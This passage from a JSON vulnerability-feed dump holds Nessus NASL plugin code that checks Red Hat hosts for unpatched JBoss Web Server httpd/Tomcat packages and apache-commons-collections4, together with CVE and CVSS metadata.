value:\"https://access.redhat.com/security/cve/cve-2017-12617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9788\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-9798\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-9788\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd22-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-javadoc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-maven-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:3113\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL6\", rpm:\"jws-2\") || rpm_exists(release:\"RHEL7\", rpm:\"jws-2\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss Web Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-devel-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ldap-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i386\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el6\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-2.2.26-58.ep6.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-debuginfo-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-devel-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-manual-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-tools-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ldap22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ssl22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : 
SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T22:32:05", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-23T00:00:00", "type": "nessus", "title": "RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc"], "id": "REDHAT-RHSA-2020-4274.NASL", "href": "https://www.tenable.com/plugins/nessus/170296", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4274. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(170296);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2020:4274\");\n\n script_name(english:\"RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-7501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4274\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1279330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rh-maven35-apache-commons-collections4 and / or rh-maven35-apache-commons-collections4-javadoc\npackages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(284, 502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/debug',\n 
